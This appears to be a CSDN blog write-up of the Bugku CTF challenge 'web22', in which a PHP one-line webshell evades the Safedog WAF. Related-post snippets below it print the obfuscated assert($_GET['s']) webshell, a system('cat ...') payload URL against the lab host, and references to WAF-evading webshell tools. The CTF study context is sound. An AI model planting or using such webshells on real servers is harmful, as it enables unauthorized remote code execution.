【bugku_writeup】web22 过狗一句话

最新推荐文章于 2021-05-31 10:11:39 发布
最新推荐文章于 2021-05-31 10:11:39 发布
阅读量199 收藏 1
点赞数 1
分类专栏: ctf_bugku_writeup
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kongzhian/article/details/112003555
版权

根据提示,这是一个一句话木马

构造payload

用蚁剑操作一下,发现没有用,会报错,这个时候考虑手动爆破

先了解几个函数

print_r()  把数组的键和值均打印出来

scandir() 扫描目录下的目录和文件,并返回数组

__FILE__ :当前目录

得到当前路径

直接访问txt文件

get it!

kzaaa
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
ReverseRSA_writeup_rsa_appprivatekey_解密_
09-29
一个WriteUp,尝试从部分私钥解密RSA加密的数据
过狗一句话原理与利用
金色%夕阳的博客
05-03 1619
过狗一句话原理与利用 在之前的文件上传漏洞就有介绍过木马文件,通过上传木马文件实现远程连接从而进行远程控制操作。利用上传文件漏洞上传木马文件过程,可能会遇到服务端对上传文件后缀、文件名、文件格式以及文件内容等进行检测过滤,从而导致木马文件上传失败。如今存在很多过滤机制与安全产品能够实现网站上传保护,比如安全狗。因此,学习如何绕过这些保护机制成功上传木马文件是至关重要的。在下面的学习我们称之为过狗一句话,该名称源于绕过安全狗的检测机制成功过上传一句话木马文件。 在学习过狗一句话之前,需要先学习一句话木马
BugKu-web篇-web22
jiuyongpinyin的博客
05-31 104
web22 看了提示就知道需要以GET方式传入s参数,然后就试了一下system()看看能不能直接执行系统命令,发现可以,那这道题目就变得简单起来了,先查看当前目录下的文件 然后直接cat 这个文档 得到flag payload如下: http://114.67.246.176:11188?s=system('cat flaga15808abee46a1d5.txt') 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
jsp过狗一句话_蚁剑改造计划之实现JSP一句话
weixin_39621060的博客
01-22 1364
点击蓝字关注我哦转载前言转载来自:yzddMr6师傅blog原文链接:https://yzddmr6.tk/posts/node-edit-java-class/本人有意写一份系列文章,主要内容是分享蚁剑改造过程的一些技巧与经验。因为蚁剑的相关文档实在比较少,可能很多同学都像自己当初一样想要二次开发可是不知如何下手。不敢贸然称之为教程,只是把改造的过程发出来供大家借鉴,希望其他同学能够...
bugku学习之26.过狗一句话 - 解题及其它完整(bypass绕过)重点!!!
s11show_163的博客
03-01 1053
打不开但是原理比较重要,去回顾bypass安全狗绕过的相关知识 用php的系统函数,突破低权限。 题目来自于bugku的"过狗一句话",这道题目有接近2100人出来,可是网上的wp并没有给出确切的原理,所以在此借这一道题目,抛砖引入。 一丶代码和分析 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); //exp...
php一句话大全,[各种一句话木马大全]各种一句话
weixin_39995351的博客
03-11 8317
PHP一句话:1、普通一句话2、防爆破一句话 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句话 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句话preg_replace()方法的e,只适用于php5及更早...
ctf_writeup:来自 Balsn 的 CTF 文章
08-03
Balsn CTF 报道Balsn 是来自台湾的 CTF 团队,成立于 2016 年。我们积极参与 CTF 比赛,并发表有关挑战的文章。 在我们的 GitHub 存储库,这些文章采用 markdown + kaTeX 格式。 有关更多信息,请参阅。...
2015_ransomware_writeup
06-23
周末勒索软件分析上周,我妻子的一位同事设法捕获了一个垃圾勒索软件; 我相信她是从一封与此类似的电子邮件得到的: 我们公司的快递员无法派送包裹。 REASON: Postal code contains an error.DELIVERY STATUS: ...
PracticalML_writeup
06-28
实用ML_writeup
Coursera-Prediction_Assignment_Writeup-1
02-24
Prediction_Assignment_Writeup 同行评分作业:预测作业撰写 ##指示 人们经常的一件事是量化他们从事某项特定活动的数量,但是他们很少量化他们某件事的程度。 在此项目,您的目标是使用来自6位参与者的...
x1DecoderPlus:AntSword(蚁剑)全参数流量XOR和Base64加伪装WebShell
05-13
介绍 AntSword(蚁剑)全参数流量XOR+Base64,基于基础上进行改造,主要用来逃避一些流量检测。 使用 php、jsp、asp文件夹会有单独的README文件,打开后可以看到具体的使用说明。 或者可以直接在github上点击进去也可以看到 蚁剑版本 v2.1.10 更新 2021年4月27日 增加Asp支持(基础功能没问题,不排除会有Bug,欢迎提交issue。) 2021年2月28日 增加Jsp支持 2021年2月23日 增加WebShell伪装,增大XOR-Key值,加多一层Base64编码传输。
2015年最新的过狗一句话大马
12-26
2015年最新的过狗一句话大马
最新过安全狗一句话
10-14
最新过安全狗一句话
过安全狗的aspx一句话webshell
02-08
过安全狗的aspx一句话webshell 纯CS模式,经典免杀
php 过狗一句话木马的编写,过狗一句话编写之代码执行漏洞函数代替eval
weixin_42514432的博客
04-12 860
1.说明tips : 补发一个之前写的过狗一句话,当时有发在博客和t00ls,由于博客重建了,就从t00ls copy过来吧。2.起因及过狗原理今天下午看坛友发了一个求助贴,让帮忙分析一句话木马呢!帖子二楼的大牛分析的很到位,那个一句话木马用了函数回调的方法,传递一个存在代码执行漏洞的函数preg_replace来代替eval执行代码然后我就想着,安全狗查杀一句话的时候,通常检测eval 和 $_...
bugku web22 过狗一句话
PRCORANGE的博客
04-15 130
题目:过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) explode(separator,string) separator规定在哪里分割字符串。string要分割的字符串。 assert()用于调试,跟eval()差不多,assert函数有任意代码执行的漏洞 构造ur
bugku-web22
baidu_39504221的博客
12-21 530
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) explode("#",$poc); 将$poc以#为分界符号分为数组 $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5].
bugkuweb22过狗一句话
EC_Carrot的博客
12-23 231
给坑了一会,这过狗一句话可以 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 进去后一片空白,什么提示都没有,就那工具去扫,也没扫出来,后来看看wp发现,这个过狗一句话居然是提示,get传入s就能执行命令,绝了! ?s=print_r(scandir('./')) 直接看到目录下有个fl.
bugkuCTF Writeup (Web22-25
Troublor的博客
01-26 1163
成绩单 需要去爆数据库信息 但是发现后台应该是不管查询到多少条记录,只显示一条,所以为了显示爆出的信息,就不能让它查出正常的信息,所以 爆数据库名:-1' union select 1,database(),3,4# 爆表名:-1' union select 1,table_name,3,4 from information_schema.tables where table_sche
全部1000元 域名_DataCon 2020 DNS恶意域名分析方向冠军writeup
最新发布
05-24
恭喜您获得域名_DataCon 2020 DNS恶意域名分析方向冠军!以下是您的writeup: 赛题概述: 本次比赛的任务是对一组恶意域名进行分析。每个参赛者需要对提供的数据集进行分析,从筛选出恶意域名,并对这些域名进行分类、分析和解释。数据集包括了近期出现的一些恶意域名,其一部分已被官方确认。 分析流程: 1. 数据集的基本情况分析 首先,对数据集进行一些基本的统计分析,比如恶意域名的数量、出现频率、域名长度、TLD分布等等。这些分析可以帮助我们初步了解数据集的特点,为后续的分析提供一些指导。 2. 特征提取 在数据集分析的基础上,我们需要对每个域名进行特征提取。常用的特征包括域名长度、字符集分布、TLD类型、子域名数量、字母频率等等。提取出来的特征可以作为后续模型训练的输入。 3. 恶意域名分类 接下来,我们需要对每个域名进行分类。分类的目的是将恶意域名和正常域名分离开来,为后续的分析提供基础。常用的分类方法包括传统的机器学习分类算法(如决策树、SVM等)和深度学习分类算法(如CNN、LSTM等)。 4. 恶意域名分析 分类完成后,我们需要对恶意域名进行进一步的分析。具体来说,我们需要分析每个恶意域名的类型、攻击方式、受害者等等。这些分析可以帮助我们更好地了解恶意域名的本质和特点,为后续的防御工作提供指导。 5. 结果展示 最后,我们需要将分析结果进行展示。可以采用报告、PPT、图表等多种形式来呈现分析结果。同时,也可以将分析结果与其他团队进行交流,分享经验、互相学习。 总结: 通过对数据集的分析和特征提取,我们可以将恶意域名和正常域名分离开来,并进行进一步的分类和分析。这些工作可以帮助我们更好地了解恶意域名的本质和特点,为后续的防御工作提供指导。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值